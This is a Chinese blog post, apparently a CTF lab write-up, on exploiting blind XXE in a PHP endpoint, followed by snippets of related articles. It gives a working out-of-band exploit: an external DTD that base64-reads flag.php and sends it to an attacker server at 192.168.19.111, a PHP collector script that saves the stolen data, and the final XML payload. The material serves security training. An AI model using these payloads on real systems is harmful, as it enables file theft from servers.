无回显xxe利用

最新推荐文章于 2025-03-11 11:09:17 发布
最新推荐文章于 2025-03-11 11:09:17 发布
阅读量367 收藏 6
点赞数 3
CC 4.0 BY-SA版权
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/asdfaa/article/details/125938395

[题目信息]:

题目名称题目难度
无回显xxe利用3

[题目考点]:

无回显xxe利用

[Flag格式]:

SangFor{rOo-xJfXXIVA4DLFyURKdxjSFnwyU4CW}

[环境部署]:

docker-compose.yml文件或者docker tar原始文件。

docker-compose up -d

[题目writeup]:

1、实验主页

2、代码解析

<?php
$xml = file_get_contents("php://input");#1
if (strlen($xml)<10){
    highlight_file("index.php.bak");
}
libxml_disable_entity_loader(false);
error_reporting(0);
$data = simplexml_load_string($xml, 'SimpleXMLElement', LIBXML_NOENT);#2
echo 'I just load, but did not dispay!';

代码有两个关键点,#1和#2。

#1处 $xml由用户post数据赋值。

#2处 simplexml_load_string函数会读取$xml文件。

与前面题目有所不同的是未显示解析xml变量的结果,即无回显。

3、利用HTTP请求,将文本的数据外带

访问flag.php状态码返回200,证明flag.php文件存在。

在vps上放置两个文件,若没有vps,也可使用操作机使用Python2或者Python3搭建Web服务,靶机可访问即可。

python2搭建Web服务命令:
python -m SimpleHTTPServer 81
python3搭建Web服务命令:
python3 -m http.server 81

在目录下放置两个文件。

evil.txt

<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=flag.php">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://192.168.19.111:81/test.php?p=%file;'>">

test.php

<?php
if (isset($_GET['p'])){
    file_put_contents('result.txt', $_GET['p']);
}

利用XXE发送两次请求,第一次请求,使用参数实体读取文件,第二次请求,将读取文件的参数实体附带在对外请求中。

4、Payload

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE everything [  
<!ENTITY % SangFor SYSTEM "http://192.168.19.111:81/evil.txt"> 
%SangFor;%int;%send;]>

5、分析

Payload会访问vps服务器上的evil.txt文件。

evil.txt的参数实体%file会将读取的flag文件base64编码带入到http://192.168.19.111:81/test.php?p=%file;,去访问本地的test.php文件,如下图所示。

将base64解码即可。

CTF中ping文件执行漏洞无回显反弹拿flag
拉风的鲨鱼的博客
03-31 9852
打开网页内容如下 我们来看一下核心代码 <?php include_once "code.txt"; if (isset($_POST['ip'])) { $p=$_POST['ip']; if(preg_match("/(;|`|&| |\\$|python|ruby|perl...
windows文件读取 xxe_XXE原来如此简单(无回显篇)
weixin_35531726的博客
01-06 1141
可能有人会好奇我为什么非要分成两篇来分享呢?我的考虑是学习需要循序渐进学习也不可能一蹴而就短暂的爆发式学习状态会让一个人丧失后续的学习动力,当然不是所有人都这样。但是绝大多数是这样的。相信你看到这篇文章的时候,你已经掌握了 回显XXE的发现和利用重点: 那么在回显XXE的发现的基础上我们来分享一下无回显XXE怎么去利用呢?既然是无回显,也就是说,我输入什么内容 ,查看什么内容,我们都将...
浅析无回显XXE(Blind XXE
蚁景网安学院
05-11 1447
XML是一种非常流行的标记语言,在解析外部实体的过程中,XML解析器可以根据URL中指定的方案(协议)来查询各种网络协议和服务(DNS,FTP,HTTP,SMB等)。 外部实体对于在文档中创建动态引用非常有用,这样对引用资源所做的任何更改都会在文档中自动更新。 但是,在处理外部实体时,可以针对应用程序启动许多攻击。
XXE漏洞-黑白盒测试+无回显
xiaoheizi的博客
07-02 1340
XML被设计是为了传输和存储数据,XXE漏洞全称XML External Entity Injection,即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。test.dtd内容:
XXE无回显攻击详解
永远是少年
12-23 1833
今天继续给大家介绍渗透测试相关知识,本文主要内容是XXE无回显攻击详解。 一、XXE无回显攻击简介 二、XXE无回显攻击实战
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
09-15
XXE 漏洞利用 - 任意文件读取 无回显 XXE(XML External Entity)是一种常见的 Web 应用程序漏洞,攻击者可以通过构造恶意的 XML 文档, trick 服务器将任意文件读取出来,导致敏感信息泄露。在本节中,我们将详细...
网络安全--XXE漏洞利用思路
jazzz98的博客
05-19 1968
如今的 web 时代,是一个前后端分离的时代,有人说 MVC 就是前后端分离,但我觉得这种分离的并不彻底,后端还是要尝试去调用渲染类去控制前端的渲染,我所说的前后端分离是,后端 api 只负责接受约定好要传入的数据,然后经过一系列的黑盒运算,将得到结果以 json 格式返回给前端,前端只负责坐享其成,拿到数据json.decode 就行了(这里的后端可以是后台代码,也可以是外部的api 接口,这里的前端可以是传统意义的前端,也可以是后台代码)
41、WEB攻防——通用漏洞&XML&XXE&无回显&DTD实体&伪协议&代码审计
qq_55202378的博客
01-31 1480
XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成。没有回显,可能原因:1、代码写错了;,带外测试也不会有回显,但是DNSlog上会有记录。例如,注释掉输出语句,前端将不会显示读取的内容。发送xml实体引用,目标文件的内容将会保存到。、内网端口扫描、攻击内网网站等危害。
【CTF-Web】XXE学习笔记(附ctfshow例题)
jayq1的博客
05-29 2288
XXE学习笔记
xxe-labs无回显
最新发布
03-12
### XXE漏洞实验室(xxe-labs)中无回显场景的解决方案 在处理XML外部实体注入(XXE)攻击时,无回显场景意味着服务器不会直接返回敏感信息给攻击者。然而,这并不表示无法利用该漏洞。一种常见的方法是通过外带...
浅析罗尔斯的无知之幕论文/浅析无回显XXE(Blind XXE)_小白黑客详细教程
2401_84915584的博客
05-17 491
xml介绍XML是一种非常流行的标记语言,在解析外部实体的过程中,XML解析器可以根据URL中指定的方案(协议)来查询各种网络协议和服务(DNS,FTP,HTTP,SMB等)。
深入剖析 XXE 漏洞:利用方式与防御策略
m0_57836225的博客
02-27 880
XXE 漏洞通常发生在应用程序解析 XML 输入时,若程序未禁止外部实体的加载,攻击者就能通过构造恶意的外部实体,获取服务器中本应被保护的数据。产生该漏洞的原因主要在于文档类型定义(DTD)部分可引用外部 DTD 文件,且 XML 解析器支持多种协议,如 file 协议可读取本地文件内容,http 协议可获取外部资源等。XXE 漏洞作为一种常见的安全漏洞,对应用程序和服务器的安全构成了严重威胁。
XXE漏洞知识及利用方法
weixin_63960760的博客
09-04 298
文档类型定义(Document Type Definition)是一套为了进行程序间的数据交换而建立的关于标记符的语法规则。它是标准通用标记语言(SGML)和可扩展标记语言(XML)1.0版规格的一部分,文档可根据某种DTD语法规则验证格式是否符合此规则。文档类型定义也可用做保证标准通用标记语言、可扩展标记语言文档格式的合法性,可通过比较文档和文档类型定义文件来检查文档是否符合规范,元素和标签使用是否正确。文件实例提供应用程序一个数据交换的格式。
XXE漏洞简介
记录学习
06-01 1227
XXE漏洞简介
无回显练习~XXE注入
weixin_67832625的博客
07-31 318
XML外部实体注入(XML Extenrnal Entity Injection),简称XXE漏洞。引发XXE漏洞的主要原因是XML解析依赖库libxml默认开启了对外部实体的引用,导致服务端在解析用户提交的XML信息时未作处理直接进行解析,导致加载恶意的外部文件和代码,造成任意文件读取,命令执行(利用条件苛刻)、内网扫描等危害。
XXE利用及修复
uuzfumo的博客
11-04 556
XXE学习的第二天,目标是XXE利用
Day60:WEB攻防-XML&XXE安全&无回显方案&OOB盲注&DTD外部实体&黑白盒挖掘
qq_61553520的博客
04-01 2179
小迪安全-Day60:WEB攻防-XML&XXE安全&无回显方案&OOB盲注&DTD外部实体&黑白盒挖掘
漏洞经验分享丨Java审计之XXE,从零基础到精通,收藏这篇就够了!
yy1715713348的博客
03-11 1104
这就是我们的利用顺序,%remote 先调用,调用后请求远程服务器上的 test.dtd ,有点类似于将 test.dtd 包含进来,然后 %int 调用 test.dtd 中的 %file, %file 就会去获取服务器上面的敏感文件。最后,一旦URL构造的&send;把我们的读取到的数据发送到我们的远程 vps 上,这样就实现了外带数据的效果,完美的解决了 XXE 无回显的问题。**解决方案是:**将嵌套的实体声明放入到一个外部文件中,这里一般是放在攻击者的服务器上,这样做可以规避错误。
XXE漏洞【回显读取文件和无回显读取文件】
大方子
08-07 7341
(若出现排版,乱码等问题请看有道文档) 文档:XXE漏洞【回显读取文件和无回显读取文?.. 链接:http://note.youdao.com/noteshare?id=b41700dbd75216812521ad5179e7291b&sub=12F412E07EDC4BDA9C5ABEF0CAD48CB7 靶场环境 XXE靶场源码:https://github.co...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值